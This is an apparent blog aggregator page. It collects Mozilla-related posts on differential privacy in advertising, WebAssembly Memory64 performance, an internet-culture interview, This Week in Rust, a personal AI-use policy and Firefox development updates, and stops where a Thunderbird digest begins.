TikTok, AliExpress, SHEIN & Co surrender Europeans’ data to authoritarian China Today, noyb has filed GDPR complaints against TikTok, AliExpress, SHEIN, Temu, WeChat and Xiaomi for unlawful data transfers to China….As none of the companies responded adequately to the complainants’ access requests, we have to assume that this includes China. But EU law is clear: data transfers outside the EU are only allowed if the destination country doesn’t undermine the protection of data.

Total information collapse by Carole Cadwalladr It was the open society that enabled Zuckerberg to build his company, that educated his engineers and created a modern scientific country that largely obeyed the rules-based order. But that’s over. And, this week is a curtain raiser for how fast everything will change. Zuckerberg took a smashing ball this week to eight years’ worth of “trust and safety” work that has gone into trying to make social media a place fit for humans. That’s undone in a single stroke.

Lawsuit: Allstate used GasBuddy and other apps to quietly track driving behavior by Kevin Purdy. (But which of the apps running tracking software are foreign-owned? Because you can register an LLC in many states anonymously, it’s impossible to tell.)

Baltic Leadership in Brussels: What the New High Representative Kaja Kallas Means for Tech Policy | TechPolicy.Press by Sophie L. Vériter. [O]nline platforms and their users are affected by EU foreign policy through counter-disinformation regulations aimed at addressing foreign threats of interference and manipulation. Indeed, technology is increasingly considered a matter of security in the EU, which means that the HRVP may well have a significant impact on the digital space within and beyond the EU.

The Ministry of Empowerment by danah boyd. This isn’t about shareholder value. It’s about a kayfabe war between tech demagogues vying to be the most powerful boy in the room.

As Australia bans social media for kids under 16, age-assurance tech is in the spotlight by Natasha Lomas (more news from the splinternet)

The Mozilla BlogRaising the bar: Why differential privacy is at the core of Anonym’s approach

Continuing our series on Anonym’s technology, this post focuses on Anonym’s use of differential privacy. Differential privacy is a cornerstone of Anonym’s approach to building confidential and effective data solutions. In this post, we’ll explain why we integrate differential privacy (DP) into all our systems and share how we tailor our implementation to meet the unique demands of advertising use cases.

As a reminder, Mozilla acquired Anonym over the summer of 2024, as a key pillar in its effort to raise the standards of privacy in the advertising industry. Separate from Mozilla surfaces like Firefox, which work to protect users from excessive data collection, Anonym provides ad tech infrastructure that focuses on improving privacy and limiting data shared between advertisers and ad platforms. 

What is differential privacy?

 Created in 2006 by Cynthia Dwork and her collaborators, DP provides a principled method to generate insights without compromising individual confidentiality. This is typically achieved by adding carefully calibrated statistical noise to computations, making individual data points indistinguishable. 

Differential Privacy has been used in a number of different contexts to enhance user privacy, notably in the US Census  and for public health use cases. This post will focus on why Anonym believes DP is an essential tool in how we create performance with our partners, while preserving privacy. For those interested in learning more about the theoretical underpinnings of DP, we’ve linked some of our favorite resources at the end of this post.

Why differential privacy for advertising use cases?

Simply put, we believe that differential privacy offers improved privacy to users while allowing analysis on ad performance. Many traditional privacy techniques used in advertising are at high risk of exposing user data, even if inadvertently. One of the most common traditional techniques is only returning aggregates when more than a minimum number of users have contributed (thresholding). The two examples below illustrate where thresholding can still result in revealing user data. 

Example 1:  In attribution reporting, measuring partially overlapping groups can reveal individual user information. Imagine a dataset that provides attribution data segmented by age group and we have implemented a threshold of ten – meaning we will only provide reporting if we have at least ten conversions for the segment. Suppose there are only nine purchasers in the “18-20” age group. Thresholding might suppress this entire segment to protect privacy. However, if a larger group—such as users exposed to ads targeted at users aged 18 to 35—is reported, and this larger group contains just one more user, it becomes relatively straightforward to deduce that the additional user is a purchaser. This demonstrates how thresholding alone can unintentionally expose individual data by leaving related groups visible. 

Example 2: Imagine a clean room consistently suppresses results for aggregations with fewer than ten individuals but always reports statistics for groups with ten or more, an attacker could introduce minor changes to the input data—such as adding a single individual—to observe how the output changes. By monitoring these changes, the attacker could reverse-engineer the behavior of the individual added.

The FTC has recently shared its perspective that relying purely on confidential computing by using data clean rooms may not adequately protect people’s privacy and we agree – users need more protection than afforded by simple aggregation and thresholding.

The advantages of differential privacy

Differential privacy offers several key improvements over the methods discussed above:

  1. Mathematical guarantees: Differential privacy provides quantifiable and provable mathematical guarantees about the confidentiality of individuals in a dataset, ensuring that the risk of revealing individual-level information is reduced. Additionally DP has a concept called composibility which states that even if we look at a large number of results over time, we can still quantify the privacy. 
  2. Protection from auxiliary information: DP ensures that even if a party such as an ad platform possesses additional information about users (which is typically the case), they cannot confidently identify specific individuals from the dataset.
  3. Minimal impact on utility: When implemented well, the actionability of DP-protected outputs is comparable to results without DP, and there is no need to suppress results. This means advertisers can trust their data to inform decision-making without compromising individual user confidentiality.

With these benefits, DP offers better privacy guarantees than other methods. We don’t need to think through all the potential edge cases like we saw for thresholding. For advertisers and platforms, the choice is clear: why wouldn’t you want the strongest available privacy protection?

How Anonym implements differential privacy

At Anonym, we recognize that one-size-fits-all solutions rarely work, especially in the complex world of advertising. That’s why all our DP implementations are bespoke to the ad platform and designed to maximize utility for each of their advertiser use cases.

Tailoring DP to the problem

Our approach takes into account the unique requirements of each advertising campaign. We use differential privacy for our ML-based solutions, but let’s use a measurement example:

  • Measurement goals: Are we measuring the number of purchases, the amount purchased, or both? We only want to release the necessary information to maximize utility.  
  • Decision context: What metrics matter most to the advertiser? In lift that could be understanding incrementality vs. statistical significance. We can tailor what we return to meet the advertiser’s needs. This increases utility by avoiding releasing information that will not change decision making.  
  • Dimensional Complexity: What dimensions are we trying to measure? Is there a hierarchy? We can improve utility by taking advantage of underlying data structures.

High utility DP requires expertise

To create solutions that are both private and actionable, our development process involves close collaboration between our teams of differential privacy experts and advertising experts.

Differential privacy experts play a crucial role in ensuring the mathematical correctness of implementations. This is a critical step because DP guarantees are only valid if implemented correctly. These DP experts carefully match the DP method to the specific problem, selecting the option that offers the highest utility. Additionally, these experts incorporate the latest innovations in DP to further enhance the effectiveness and practicality of the solutions.

Advertising experts, on the other hand, help ensure the base ads algorithms are optimized to deliver high-utility results. Their insights further optimize DP methods for decision-making, aligning the outputs with the specific needs of advertisers.

This multidisciplinary approach helps our solutions meet rigorous mathematical privacy standards while empowering advertisers to make effective, data-driven decisions.

Conclusion

In an era of increasing data collection and heightened privacy concerns, differential privacy is a key technique for protecting the confidentiality of individual data without sacrificing utility. At Anonym, we’ve built DP into the foundation of our systems because we believe it’s the best way to deliver actionable insights while safeguarding user trust.

By combining deep expertise in DP with a nuanced understanding of advertising, we’re able to offer solutions that meet the needs of advertisers, regulators, and, most importantly, people.

Further Reading: Check out our favorite resources to learn more about differential privacy:

The post Raising the bar: Why differential privacy is at the core of Anonym’s approach appeared first on The Mozilla Blog.

Spidermonkey Development BlogIs Memory64 actually worth using?

After many long years, the Memory64 proposal for WebAssembly has finally been released in both Firefox 134 and Chrome 133. In short, this proposal adds 64-bit pointers to WebAssembly.

If you are like most readers, you may be wondering: “Why wasn’t WebAssembly 64-bit to begin with?” Yes, it’s the year 2025 and WebAssembly has only just added 64-bit pointers. Why did it take so long, when 64-bit devices are the majority and 8GB of RAM is considered the bare minimum?

It’s easy to think that 64-bit WebAssembly would run better on 64-bit hardware, but unfortunately that’s simply not the case. WebAssembly apps tend to run slower in 64-bit mode than they do in 32-bit mode. This performance penalty depends on the workload, but it can range from just 10% to over 100%—a 2x slowdown just from changing your pointer size.

This is not simply due to a lack of optimization. Instead, the performance of Memory64 is restricted by hardware, operating systems, and the design of WebAssembly itself.

What is Memory64, actually?

To understand why Memory64 is slower, we first must understand how WebAssembly represents memory.

When you compile a program to WebAssembly, the result is a WebAssembly module. A module is analogous to an executable file, and contains all the information needed to bootstrap and run a program, including:

  • A description of how much memory will be necessary (the memory section)
  • Static data to be copied into memory (the data section)
  • The actual WebAssembly bytecode to execute (the code section)

These are encoded in an efficient binary format, but WebAssembly also has an official text syntax used for debugging and direct authoring. This article will use the text syntax. You can convert any WebAssembly module to the text syntax using tools like WABT (wasm2wat) or wasm-tools (wasm-tools print).

Here’s a simple but complete WebAssembly module that allows you to store and load an i32 at address 16 of its memory.

(module
  ;; Declare a memory with a size of 1 page (64KiB, or 65536 bytes)
  (memory 1)

  ;; Declare, and export, our store function
  (func (export "storeAt16") (param i32)
    i32.const 16  ;; push address 16 to the stack
    local.get 0   ;; get the i32 param and push it to the stack
    i32.store     ;; store the value to the address
  )

  ;; Declare, and export, our load function
  (func (export "loadFrom16") (result i32)
    i32.const 16  ;; push address 16 to the stack
    i32.load      ;; load from the address
  )
)

Now let’s modify the program to use Memory64:

(module
  ;; Declare an i64 memory with a size of 1 page (64KiB, or 65536 bytes)
  (memory i64 1)

  ;; Declare, and export, our store function
  (func (export "storeAt16") (param i32)
    i64.const 16  ;; push address 16 to the stack
    local.get 0   ;; get the i32 param and push it to the stack
    i32.store     ;; store the value to the address
  )

  ;; Declare, and export, our load function
  (func (export "loadFrom16") (result i32)
    i64.const 16  ;; push address 16 to the stack
    i32.load      ;; load from the address
  )
)

You can see that our memory declaration now includes i64, indicating that it uses 64-bit addresses. We therefore also change i32.const 16 to i64.const 16. That’s it. This is pretty much the entirety of the Memory64 proposal1.

How is memory implemented?

So why does this tiny change make a difference for performance? We need to understand how WebAssembly engines actually implement memories.

Thankfully, this is very simple. The host (in this case, a browser) simply allocates memory for the WebAssembly module using a system call like mmap or VirtualAlloc. WebAssembly code is then free to read and write within that region, and the host (the browser) ensures that WebAssembly addresses (like 16) are translated to the correct address within the allocated memory.

However, WebAssembly has an important constraint: accessing memory out of bounds will trap, analogous to a segmentation fault (segfault). It is the host’s job to ensure that this happens, and in general it does so with bounds checks. These are simply extra instructions inserted into the machine code on each memory access—the equivalent of writing if (address >= memory.length) { trap(); } before every single load2. You can see this in the actual x64 machine code generated by SpiderMonkey for an i32.load3:

  movq 0x08(%r14), %rax       ;; load the size of memory from the instance (%r14)
  cmp %rax, %rdi              ;; compare the address (%rdi) to the limit
  jb .load                    ;; if the address is ok, jump to the load
  ud2                         ;; trap
.load:
  movl (%r15,%rdi,1), %eax    ;; load an i32 from memory (%r15 + %rdi)

These instructions have several costs! Besides taking up CPU cycles, they require an extra load from memory, they increase the size of machine code, and they take up branch predictor resources. But they are critical for ensuring the security and correctness of WebAssembly code.

Unless…we could come up with a way to remove them entirely.

How is memory really implemented?

The maximum possible value for a 32-bit integer is about 4 billion. 32-bit pointers therefore allow you to use up to 4GB of memory. The maximum possible value for a 64-bit integer, on the other hand, is about 18 sextillion, allowing you to use up to 18 exabytes of memory. This is truly enormous, tens of millions of times bigger than the memory in even the most advanced consumer machines today. In fact, because this difference is so great, most “64-bit” devices are actually 48-bit in practice, using just 48 bits of the memory address to map from virtual to physical addresses4.

Even a 48-bit memory is enormous: 65,536 times larger than the largest possible 32-bit memory. This gives every process 281 terabytes of address space to work with, even if the device has only a few gigabytes of physical memory.

This means that address space is cheap on 64-bit devices. If you like, you can reserve 4GB of address space from the operating system to ensure that it remains free for later use. Even if most of that memory is never used, this will have little to no impact on most systems.

How do browsers take advantage of this fact? By reserving 4GB of memory for every single WebAssembly module.

In our first example, we declared a 32-bit memory with a size of 64KB. But if you run this example on a 64-bit operating system, the browser will actually reserve 4GB of memory. The first 64KB of this 4GB block will be read-write, and the remaining 3.9999GB will be reserved but inaccessible.

By reserving 4GB of memory for all 32-bit WebAssembly modules, it is impossible to go out of bounds. The largest possible pointer value, 2^32-1, will simply land inside the reserved region of memory and trap. This means that, when running 32-bit wasm on a 64-bit system, we can omit all bounds checks entirely5.

This optimization is impossible for Memory64. The size of the WebAssembly address space is the same as the size of the host address space. Therefore, we must pay the cost of bounds checks on every access, and as a result, Memory64 is slower.

So why use Memory64?

The only reason to use Memory64 is if you actually need more than 4GB of memory.

Memory64 won’t make your code faster or more “modern”. 64-bit pointers in WebAssembly simply allow you to address more memory, at the cost of slower loads and stores.

The performance penalty may diminish over time as engines make optimizations. Bounds checking strategies can be improved, and WebAssembly compilers may be able to eliminate some bounds checks at compile time. But it is impossible to beat the absolute removal of all bounds checks found in 32-bit WebAssembly.

Furthermore, the WebAssembly JS API constrains memories to a maximum size of 16GB. This may be quite disappointing for developers used to native memory limits. Unfortunately, because WebAssembly makes no distinction between “reserved” and “committed” memory, browsers cannot freely allocate large quantities of memory without running into system commit limits.

Still, being able to access 16GB is very useful for some applications. If you need more memory, and can tolerate worse performance, then Memory64 might be the right choice for you.

Where can WebAssembly go from here? Memory64 may be of limited use today, but there are some exciting possibilities for the future:

  • Bounds checks could be better supported in hardware in the future. There has already been some research in this direction—for example, see this 2023 paper by Narayan et. al. With the growing popularity of WebAssembly and other sandboxed VMs, this could be a very impactful change that improves performance while also eliminating the wasted address space from large reservations. (Not all WebAssembly hosts can spend their address space as freely as browsers.)

  • The memory control proposal for WebAssembly, which I co-champion, is exploring new features for WebAssembly memory. While none of the current ideas would remove the need for bounds checks, they could take advantage of virtual memory hardware to enable larger memories, more efficient use of large address spaces (such as reduced fragmentation for memory allocators), or alternative memory allocation techniques.

Memory64 may not matter for most developers today, but we think it is an important stepping stone to an exciting future for memory in WebAssembly.


  1. The rest of the proposal fleshes out the i64 mode, for example by modifying instructions like memory.fill to accept either i32 or i64 depending on the memory’s address type. The proposal also adds an i64 mode to tables, which are the primary mechanism used for function pointers and indirect calls. For simplicity, they are omitted from this post. 

  2. In practice the instructions may actually be more complicated, as they also need to account for integer overflow, offset, and align

  3. If you’re using the SpiderMonkey JS shell, you can try this yourself by using wasmDis(func) on any exported WebAssembly function. 

  4. Some hardware now also supports addresses larger than 48 bits, such as Intel processors with 57-bit addresses and 5-level paging, but this is not yet commonplace. 

  5. In practice, a few extra pages beyond 4GB will be reserved to account for offset and align, called “guard pages”. We could reserve another 4GB of memory (8GB in total) to account for every possible offset on every possible pointer, but in SpiderMonkey we instead choose to reserve just 32MiB + 64KiB for guard pages and fall back to explicit bounds checks for any offsets larger than this. (In practice, large offsets are very uncommon.) For more information about how we handle bounds checks on each supported platform, see this SMDOC comment (which seems to be slightly out of date), these constants, and this Ion code. It is also worth noting that we fall back to explicit bounds checks whenever we cannot use this allocation scheme, such as on 32-bit devices or resource-constrained mobile phones. 

The Mozilla BlogSlate’s ICYMI hosts on their online obsessions and wildest 2025 predictions

Two women are pictured in a grid-patterned orange background. The woman on the left smiles over her shoulder, wearing a pink sweater, with a pencil icon near her image. The woman on the right faces the camera with a neutral expression, wearing a black top, with a microphone icon near her image.<figcaption class="wp-element-caption">Candice Lim and Kate Lindsay are the hosts of ICYMI, Slate’s podcast about internet culture.</figcaption>

Here at Mozilla, we are the first to admit the internet isn’t perfect, but we know the internet is pretty darn magical. The internet opens up doors and opportunities, allows for human connection, and lets everyone find where they belong — their corners of the internet. We all have an internet story worth sharing. In My Corner Of The Internet, we talk with people about the online spaces they can’t get enough of, the sites and forums that shaped them, and how they would design their own corner of the web.

This month, we chat with Candice Lim of Slate’s internet culture podcast, ICYMI, and her new cohost, Kate Lindsay, about their first online obsessions, internet hot takes and predictions for 2025.

What is your favorite corner of the internet? 

Kate: My group chat. I’m a full-time lurker on platforms like TikTok, to the point where I have time limits on my phone, but when it comes to actually participating in the discourse or sharing my life, I now only do it in a space where I’m pretty sure everyone likes me.

Candice: There’s this TikTok account called @petunia_rocks, and it’s run by a college student who voices a stuffed hippo named Petunia. Her account is full of cute little things like, Petunia’s nighttime routine, Petunia cold-calling frat guys, Petunia going to her grandparent’s house for Thanksgiving. And Petunia has a very cute voice, but she also has this adorable growl (hmmmmph!) that I use in my daily life all the time. I stan Petunia and she does, indeed, rock.

What is an internet deep dive that you can’t wait to jump back into?

Kate: I want to know what happened to the 2010s-era YouTube BritCrew. Almost all still post but not all are still friends, and I need to know what some think of the direction that others have taken…

Candice: I have a few that I check in on every year: What’s the nature of Mindy Kaling and BJ Novak’s relationship, what finally made Charli XCX break up with her ex-boyfriend Huck, what really caused Aaron Rodgers and Shailene Woodley to call off their engagement, what is the hour-by-hour timeline of Olivia Munn and John Mulaney getting together, what really happened when Edith Zimmerman profiled Chris Evans for GQ, and was there an actual love triangle between Olivia Rodrigo, Sabrina Carpenter, and Joshua Bassett.

What is the one tab you always regret closing?

Kate: The spelling of “grey” vs. “gray” because I always forget and just have to Google it again. I still don’t know right now.

Candice: Drew Starkey fancams.

What can you not stop talking about on the internet right now?

Kate: How it’s making us lonely! The internet should be for news, seeing what my high school classmates look like now, and fandoms. It should not be a single replacement for working, shopping, socializing and ever needing to leave the house.

Candice: Same as Kate. Maybe we’ll even make an ICYMI episode about it soon 🙂

What was the first online community you engaged with?

Kate: Mugglenet and FanFiction.net, for the same reason: to see if Harry and Hermoine ever kiss.

Candice: I would say MileyWorld.com, which was a Miley Cyrus fan site that I was obsessed with. It had this MySpace feel to it, where “Miley” would leave messages, videos, and notes for her fans to comment on. There was a paid subscription element to the site, which I feel like is a bit gatekeep-y especially when it’s catered to 12 year olds. But the reason I stopped going on there is because I was catfished by someone who claimed to be Mandy Jiroux, Miley’s best friend whom you may know from the iconic program, The Miley and Mandy Show. “Mandy” and I were in the DMs, and on the front page of MileyWorld, they would spotlight one fan every day, and it was a big deal. It was like Reddit Karma points. And I had such a nice conversation with “Mandy,” that she promised she would make me the spotlighted fan on the homepage the next day. I was so excited and bragged about it at school. But I forgot that I had a basketball game the day of my alleged crowning, so I went straight from school to the game, and I came home and conked out. And to this day, I will never, ever know if I was really MileyWorld’s fan of the day.

If you could create your own corner of the internet, what would it look like?

Kate: MySpace plus the ability to post videos, minus the requirement to publicly rank your friends.

Candice: It would combine: KindleTok, hopecore, Bella Hadid’s aesthetic and those TikTok tarot readings where they don’t have any hashtags or captions on the posts so you totally know that video was meant for you.

What articles and/or videos are you waiting to read/watch right now?

Kate: I’d love to open up YouTube and see that one of my various English mums has posted a 40-minute long vlog of them cleaning their house and running errands. I just checked and one has 🙂

Candice: I really love Wishbone Kitchen’s content. Her TikToks have leaned away from “day in the life of a private chef in the Hamptons” and toward her daily cooking rituals as someone who just bought a house in the Hamptons. And usually, when an influencer buys a home, they get hate (envy) for it but I am really happy for Meredith because she showed the work that it took to get there, and her content doesn’t strike me as braggy. Instead, she nurtures her garden, she takes her dogs on a walk, she microplanes local cheeses, and it’s very Cotwaldsian to me. She feels like American Taggie from Rivals. I’ve been saving her 45-minute Christmas and Thanksgiving dinner videos for those cozy nights in when you’re cooking a big bolognese and you want something light and bright that encourages you to be patient while cooking. I like her videos because audio-wise, there’s something really satisfying about hearing the garlic sizzle and short rib sear and her videos make everything seem doable.

What’s your wildest internet culture prediction for 2025?

Kate: Digital wellness as the new self-care — mindful consumption, logging off, physical media (and then posting about it all online, of course).

Candice: I think a big celebrity or influencer will sue @PopCrave for forgetting to say they “stunned” in a photo.


Kate Lindsay is a writer from Brooklyn, New York and author of the internet culture newsletter Embedded. Her work has also appeared in The New York Times, The Atlantic, Bustle, and GQ, launching viral phenomena like the millennial pause and “rawdogging” flights. Previously, she was a newsletter editor at The Atlantic and a staff writer at Refinery29.

Candice Lim is the co-host of ICYMI, Slate’s podcast about internet culture. She comes to Slate from NPR, where she was an assistant producer at Pop Culture Happy Hour. Prior to that, she was an intern at NPR’s How I Built This, the Hollywood Reporter, WBUR and the Orange County Register. She graduated from Boston University with a bachelor’s degree in journalism and grew up in Orange County, California.

The post Slate’s ICYMI hosts on their online obsessions and wildest 2025 predictions  appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 582

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is vidyut, a Sanskrit toolkit containing functionality about meter, segmentation, inflections, etc.

Thanks to Arun Prasad for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

RFCs
Rust
Rustup

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

  • Rust Week (Rust NL) | Closes on 2025-01-19 | Utrecht, NL | Event on 2025-05-13 & 2025-05-14
  • Rust Summit | Rolling deadline | Belgrade, RS | Event on 2025-06-07

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

469 pull requests were merged in the last week

Rust Compiler Performance Triage

A quiet week with little change to the actual compiler performance. The biggest compiler regression was quickly recognized and reverted.

Triage done by @rylev. Revision range: 0f1e965f..1ab85fbd

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
0.4% [0.1%, 1.8%] 21
Regressions ❌
(secondary)
0.5% [0.0%, 2.0%] 35
Improvements ✅
(primary)
-0.8% [-2.7%, -0.3%] 6
Improvements ✅
(secondary)
-10.2% [-27.8%, -0.1%] 13
All ❌✅ (primary) 0.2% [-2.7%, 1.8%] 27

4 Regressions, 3 Improvements, 3 Mixed; 3 of them in rollups 44 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-01-15 - 2025-02-12 🦀

Virtual
Europe
North America
Oceania:

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

This is a wonderful unsoundness and I am incredibly excited about it :3

lcnr on github

Thanks to Christoph Grenz for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Don MartiHow this site uses AI

This site is written by me personally except for anything that is clearly marked up and cited as a direct quotation. If you see anything on here that is not cited appropriately, please contact me.

Generative AI output appears on this site only if I think it really helps make a point and only if I believe that my use of a similar amount and kind of material from a relevant work in the training set would be fair use.

For example, I quote a sentence of generative AI output in LLMs and reputation management. I believe that I would have been within my fair use rights to use the same amount of text from a copyrighted history book or article.

In LLMs and the web advertising business, my point was not only that the Big Tech companies are crooked, but that it’s so obvious. A widely available LLM can easily point out that a site running Big Tech ads—for real brands—is full of ripped-off content. So I did include a short question and answer session with ChatGPT. It’s really getting old that big companies are constantly being shocked to discover infringement and other crimes when their own technology could have spotted it.

Usually when I mention AI or LLMs on here I don’t include any generated content.

More slash pages

Related

notes on ad-supported piracy LLM-generated sites are a refinement of an existing business model by infringing sites and their Big Tech enablers.

use a Large Language Model, or eat Tide Pods? Make up your own mind, I guess.

AI legal links

personal AI in the rugpull economy The big opportunity for personal AI could be in making your experiences less personalized.

Block AI training on a web site (Watch this space. More options and a possible standard could be coming in 2025.)

Money bots talk and bullshit bots walk?, boring bots ftw, How we get to the end of prediction market winter (AI and prediction markets complement each other—prediction markets need noise and arbitrage, AI needs a scalable way to measure quality of output.)

Firefox NightlyKey Improvements – These Weeks in Firefox: Issue 174

Highlights

  • Nicolas Chevobbe [:nchevobbe] Added $$$ , a console helper that retrieve elements from the document, including those in the ShadowDOM (#1899558)
  • Thanks to John Diamond for contributing changes to allow users to assign custom keyboard shortcuts for WebExtensions using the F13-F19 extended function keys
    • You can access this menu from the cog button in about:addons
    • The "Manage Extension Shortcuts" pane from about:addons. A series of keyboard shortcut mappings for an extension is displayed - one of which is mapped to the F19 key.

      You can find this menu in about:addons by clicking the cog icon and choosing “Manage Extension Shortcuts”

    • NOTE: F13-F19 function keys are still going to be invalid if specified in the default shortcuts set in the extension manifest
  • We’re going to launch the “Sections” feed experiment in New Tab soon. This layout changes how stories are laid out (new modular layouts instead of the same medium cards, some sections organized into categories)
    • Try it out yourself in Nightly by setting the following to TRUE
      • browser.newtabpage.activity-stream.discoverystream.sections.enabled
      • browser.newtabpage.activity-stream.discoverystream.sections.cards.enabled
  • Dale implemented searching Tab Groups by name in the Address Bar and showing them as Actions – Bug 1935195

Friends of the Firefox team

Resolved bugs (excluding employees)

Volunteers that fixed more than one bug

  • Abhijeet Chawla[:ff2400t]
  • Meera Murthy

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Thanks to Matt Mower for contributing CSS cleanup and modernization changes to the “Manage Extensions Shortcuts” section of about:addons – Bug 1921634
WebExtensions Framework
  • A warning message bar will be shown in the Extensions panel under the soft-blocked extensions that have been re-enabled by the user – Bug 1925291
WebExtension APIs
  • Native messaging support for snap-packaged Firefox has been now merged into mozilla-central – Bug 1661935
    • NOTE: Bug 1936114 is tracking fixing an AttributeError being hit by mach xpcshell-test as a side-effect of changes applied by Bug 1661935, until the fix is landed mach test is a short-term workaround to run xpcshell tests locally

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Dan (temidayoazeez032) implemented the browser.getClientWindows command which allows clients to retrieve a list of information about the current browser windows. (#1855025)
    • Spencer (speneth1) removed a duplicated get windows helper which used to be implemented in two different classes. (#1925985)
    • Patrick (peshannon104) added a log to help investigate network events for which WebDriver BiDi didn’t manage to retrieve all the response information. (#1930848)
  • Updates:
    • Sasha improved support for installing extensions with Marionette and geckodriver. Geckodriver was updated to push the addon file to the device using base 64, which allowed to enable installing extensions on GeckoView. (#1806135)
    • Still on the topic of add-ons, Sasha also added a flag to install add-ons allowed to run in Private Browsing mode. (#1926311)
    • Julian added two new fields in BiDi network events: initiatorType and destination, coming from the fetch specification. The previous initiator.type field had no clear definition and is now deprecated. This supports the transition of Cypress from CDP to WebDriver BiDi. (#1904892)
    • Julian also fixed a small issue with those two new fields, which had unexpected values for top-level document loads. (#1933331)
    • After discussions during TPAC, we decided to stop emitting various events for the initial about:blank load. Sasha fixed a first gap on this topic: WebDriver BiDi will no longer emit browsingContext.navigationStarted events for such loads. (#1922014)
    • Henrik improved the stability of commands in Marionette in case the browsing context gets discarded (#1930530).
    • Henrik also did similar improvements for our WebDriver BiDi implementation, and fine-tuned our logic to retry commands sent to content processes (#1927073).
    • Julian reverted the message for UnexpectedAlertOpenError in Marionette to make sure we include the dialog’s text, as some clients seemed to rely on this behavior. (#1924469)
    • Thanks to :valentin who fixed an issue with nsITimedChannel.asyncOpenTime, which sometimes was set to 0 unexpectedly (#1931514). Prior to that, Julian added a small workaround to fallback on nsITimedChannel.channelCreationTime, but we will soon revert it (#1930849).
    • Sasha updated the browsingContext.traverseHistory command to only accept top-level browsing contexts. (#1924859)

Lint, Docs and Workflow

New Tab Page

  • FakeSpot recommended gifts experiment ended last week
  • For this next release the team is working on:
    • Supporting experiments with more industry standard ad sizes (Leaderboard and billboard)
    • Iterating/continuing Sections feed experiment
    • AdsFeed tech debt (Consolidating new tab ads logic into one place)

Password Manager

Places

  • Marco removed the old bookmarks transaction manager (undo/redo) code, as a better version of it shipped for a few months – Bug 1870794
  • Marco has enabled for release in Firefox 135 a safeguard preventing origins from overwhelming history with multiple consecutive visits, the feature has been baking in Nightly for the last few months – Bug 1915404
  • Yazan fixed a regression with certain svg favicons being wrongly picked, and thus having a bad contrast in the UI (note it may take a few days for some icons to be expired and replaced on load) – Bug 1933158 

Search and Navigation

  • Address bar revamp (aka Scotch Bonnet project)
    • Moritz fixed a bug causing address bar results flicker due to switch to tab results – Bug 1901161
    • Yazan fixed a bug with Actions search mode wrongly persisting after picking certain actions – Bug 1919549
    • Dale added badged entries to the unified search button to install new OpenSearch engines – Bug 1916074
    • Dale fixed a problem with some installed OpenSearch engines not persisting after restart – Bug 1927951
    • Daisuke implemented dynamic hiding of the unified search button (a few additional changes incoming to avoid shifting the URL on focus) – Bug 1928132
    • Daisuke fixed a problem with Esc not closing the address bar dropdown when unified search button is focused – Bug 1933459
  • Suggest
  • Other relevant fixes
    • Contributor Anthony Mclamb fixed unexpected console error messages when typing just ‘@’ in the address bar – Bug 1922535

Storybook/Reusable Components

  • Anna Kulyk (welcome! Yes of moz-message-bar fame!) cleaned up some leftover code in moz-card Bug 1910631
  • Mark Kennedy updated the Heartbeat infobar to use the moz-five-star component, and updated the component to support selecting a rating Bug 1864719
  • Mark Kennedy updated the about:debugging page to use the new –page-main-content-width design token which had the added benefit of bringing our design tokens into the chrome://devtools/ package Bug 1931919
  • Tim added support for support links in moz-fieldset Bug 1917070 Storybook
  • Hanna updated our support links to be placed after the description, if one is present Bug 1928501 Storybook

Mozilla ThunderbirdThunderbird Monthly Development Digest – December 2024

Happy New Year Thunderbirders! With a productive December and a good rest now behind us, the team is ready for an amazing year. Since the last update, we’ve had some successes that have felt great. We also completed a retrospective on a major pain point from last year. This has been humbling and has provided an important opportunity for learning and improvement.

Exchange Web Services support in Rust

